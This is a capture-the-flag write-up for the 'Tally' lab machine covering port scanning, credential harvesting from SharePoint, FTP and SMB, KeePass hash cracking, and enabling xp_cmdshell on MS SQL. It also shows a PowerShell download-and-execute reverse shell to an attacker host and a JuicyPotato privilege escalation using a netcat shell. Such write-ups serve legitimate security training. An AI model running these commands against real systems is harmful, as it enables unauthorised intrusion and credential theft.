Tally

Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.59 -oN allPorts

• -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

• --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

• -p- scanning the entire port range, from 1 to 65535.

• -T5 insane mode, it is the fastest mode of the nmap time template.

• -Pn assume the host is online.

• -n scan without reverse DNS resolution.

• -oN save the scan result into a file, in this case the allports file.

# Nmap 7.93 scan initiated Mon Nov  7 17:21:56 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.59
Nmap scan report for 10.10.10.59
Host is up (0.054s latency).
Not shown: 65514 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
81/tcp    open  hosts2-ns
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
808/tcp   open  ccproxy-http
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
15567/tcp open  unknown
32843/tcp open  unknown
32844/tcp open  unknown
32846/tcp open  unknown
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

# Nmap done at Mon Nov  7 17:22:10 2022 -- 1 IP address (1 host up) scanned in 14.24 seconds

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p21,80,81,135,445,808,1433,5985,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670 10.10.10.59 -oN targeted

• -sC performs the scan using the default set of scripts.

• -sV enables version detection.

• -oN save the scan result into file, in this case the targeted file.

# Nmap 7.93 scan initiated Mon Nov  7 17:24:14 2022 as: nmap -sCV -p21,80,81,135,445,808,1433,5985,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670 -oN targeted 10.10.10.59
Nmap scan report for 10.10.10.59
Host is up (0.34s latency).

PORT      STATE SERVICE            VERSION
21/tcp    open  ftp                Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http               Microsoft IIS httpd 10.0
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
|_http-server-header: Microsoft-IIS/10.0
|_http-generator: Microsoft SharePoint
| http-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
81/tcp    open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp   open  msrpc              Microsoft Windows RPC
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp   open  ccproxy-http?
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2016 13.00.1601.00; RTM
|_ssl-date: 2022-11-07T16:25:32+00:00; +1s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-11-07T16:18:15
|_Not valid after:  2052-11-07T16:18:15
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
15567/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| http-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
32843/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
32844/tcp open  ssl/http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2022-11-07T16:25:32+00:00; +1s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| tls-alpn: 
|   h2
|_  http/1.1
32846/tcp open  storagecraft-image StorageCraft Image Manager
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc              Microsoft Windows RPC
49665/tcp open  msrpc              Microsoft Windows RPC
49666/tcp open  msrpc              Microsoft Windows RPC
49667/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
49669/tcp open  msrpc              Microsoft Windows RPC
49670/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-11-07T16:25:23
|_  start_date: 2022-11-07T16:17:53

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov  7 17:25:33 2022 -- 1 IP address (1 host up) scanned in 79.59 seconds

The website shows a SharePoint application.

Doing some research on the internet, I found a pentest report on SharePoint which shows directories such as /_layouts/viewlsts.aspx.

Inside the Documents folder there is one file called ftp-details.docx.

Let's get the content of the document with the docx2text tool.

docx2txt ftp-details.docx

cat ftp-details.txt

FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in

On the other hand, the SitePages folder contains another item.

http://10.10.10.59/SitePages/Forms/AllPages.aspx

The page contains a message with an FTP username called ftp_user.

http://10.10.10.59/SitePages/FinanceTeam.aspx

Exploitation

Now, we have valid credentials for the FTP server.

ftp ftp_user@10.10.10.59

Connected to 10.10.10.59.
220 Microsoft FTP Service
331 Password required
Password: UTDRSCH53c"$6hys
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50488|)
125 Data connection already open; Transfer starting.
08-31-17  10:51PM       <DIR>          From-Custodian
10-01-17  10:37PM       <DIR>          Intranet
08-28-17  05:56PM       <DIR>          Logs
09-15-17  08:30PM       <DIR>          To-Upload
09-17-17  08:27PM       <DIR>          User
226 Transfer complete.

As it looks like the content of the FTP server is big, let's mount it to a directory called ftp with curlftpfs.

mkdir ftp

curlftpfs 10.10.10.59 ftp -o user=ftp_user:'UTDRSCH53c"$6hys'

Inside the ftp/User/Tim/Files/ there is one file called tim.kdbx, which is used by KeePass, and may contain some credentials.

ls -la ftp/User/Tim/Files/

total 8
---------- 1 root root   17 Sep 15  2017 bonus.txt
d--------- 1 root root    0 Sep 15  2017 KeePass-2.36
---------- 1 root root 2222 Sep 15  2017 tim.kdbx

Let's copy that filw to our current directory, get it's hash, and try to break it with john.

cp ftp/User/Tim/Files/tim.kdbx .

keepass2john tim.kdbx > hash

john --wordlist=/usr/share/wordlists/rockyou.txt hash

Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
simplementeyo    (tim)     
1g 0:00:00:48 DONE (2022-11-07 20:04) 0.02060g/s 508.7p/s 508.7c/s 508.7C/s simplementeyo..sept17
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Now that we have the password, let's open the passwords database with keepassxc.

keepassxc tim.kdbx

There is one entry called TALLY ACCT share with the username Finance and the password Acc0unting.

These crednetials are valid for the SMB server.

cme smb 10.10.10.59 -u "Finance" -p "Acc0unting

SMB         10.10.10.59     445    TALLY            [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True)
SMB         10.10.10.59     445    TALLY            [+] TALLY\Finance:Acc0unting

By listing the shares, we'll see that we can read the ACCT share.

smbmap -H 10.10.10.59 -u "Finance" -p "Acc0unting"

[+] IP: 10.10.10.59:445 Name: 10.10.10.59                                       
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ACCT                                                    READ ONLY
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC

Let's create another directory called smb, and mount the ACCT share in it.

mount -t cifs //10.10.10.59/ACCT smb/ -o username=Finance,password=Acc0unting

Inside the smb/zz_Migration/Binaries/New\ folder/ directory there is one binary called tester.exe.

ls -la smb/zz_Migration/Binaries/New\ folder/

total 676316
drwxr-xr-x 2 root root      4096 Sep 21  2017 .
drwxr-xr-x 2 root root      4096 Sep 17  2017 ..
-rwxr-xr-x 1 root root 389188014 Sep 13  2017 crystal_reports_viewer_2016_sp04_51051980.zip
-rwxr-xr-x 1 root root  18159024 Sep 11  2017 Macabacus2016.exe
-rwxr-xr-x 1 root root  21906356 Aug 30  2017 Orchard.Web.1.7.3.zip
-rwxr-xr-x 1 root root    774200 Sep 17  2017 putty.exe
-rwxr-xr-x 1 root root    483824 Sep 15  2017 RpprtSetup.exe
-rwxr-xr-x 1 root root 254599112 Sep 11  2017 tableau-desktop-32bit-10-3-2.exe
-rwxr-xr-x 1 root root    215552 Sep  1  2017 tester.exe
-rwxr-xr-x 1 root root   7194312 Sep 13  2017 vcredist_x64.exe

If we print the strings of the binary, we'll find some credentials for the database server.

strings smb/zz_Migration/Binaries/New\ folder/tester.exe | more

...
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
...

Now we could log in to the MS SQL server on port 1433 with the mssqlclient tool from impacket.

impacket-mssqlclient sa@10.10.10.59

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Password: GWE3V65#6KFH93@4GWTG2G
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(TALLY): Line 1: Changed database context to 'master'.
[*] INFO(TALLY): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 665) 
[!] Press help for extra shell commands

We could try to run commands with xp_cmdshell, but it is disabled.

xp_cmdshell whoami

[-] ERROR(TALLY): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

But we can enable it with enable_xp_cmdshell.

enable_xp_cmdshell

xp_cmdshell whoami

output                                                                             

--------------------------------------------------------------------------------   

tally\sarah                                                                        

NULL

Time to get a shell. First, download the Invoke-PowerShellTcp.ps1 file from Nishang, and add the following function at the end of the script. I will rename the file to rv.ps1.

mv Invoke-PowerShellTcp.ps1 rv.ps1

nano rv.ps1

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4444

Now, set a netcat listener on port 4444 with rlwrap.

rlwrap nc -lvnp 4444

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

And set a simple HTTP server with python on the current directory.

python -m http.server 80

Now, if we run the following command, we should get a reverse shell as the sarah user, and then we'll be able to grab the user flag.

xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadString("http://10.10.14.8/rv.ps1")

Listening on 0.0.0.0 4444
Connection received on 10.10.10.59 50694
Windows PowerShell running as user Sarah on TALLY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
tally\sarah
PS C:\Windows\system32> type \users\sarah\desktop\user.txt
26bf3a939acfe12a9088270ea0fe2d21

Privilege Escalation

Let's start by seeing what privileges the user tolis has.

whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

If a user has the SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.

JuicyPotato is a local privilege escalation tool for Windows, which uses COM objects for privilege escalation. It is needed that SeImpersonate or SeAssignPrimaryToken are enabled.

https://github.com/ohpe/juicy-potato

To escalate privileges, we'll have to transfer JuicyPotato.exe and nc.exe binaries to the victim machine. Let's set a python HTTP server on the directory where we have those binaries.

python -m SimpleHTTPServer

And download the binaries from the desktop folder of the tolis user.

certutil.exe -f -urlcache -split http://10.10.14.8:8000/JuicyPotato.exe JuicyPotato.exe

certutil.exe -f -urlcache -split http://10.10.14.8:8000/nc.exe nc.exe

Before executing the JuicyPotato.exe binary, let's set another netcat listener on port 5555 to catch a reverse shell as the NT AUTHORITY\SYSTEM user.

nc -lvnp 5555

• -l listen mode.

• -v verbose mode.

• -n numeric-only IP, no DNS resolution.

• -p specify the port to listen on.

Finally, let's run the Juicy Potato binary and get a shell as the NT AUTHORITY\SYSTEM user. Then all we have to do is reap the harvest and take the root flag.

JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\windows\temp\privEsc\nc.exe -e cmd 10.10.14.8 5555"

• -t createprocess call.

• -l COM server listen port.

• -p program to launch.

• -a specify command arguments.

Listening on 0.0.0.0 5555
Connection received on 10.10.10.59 50731
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type \users\administrator\desktop\root.txt
7850cfbb5ab1ddefb5406ff662fecec7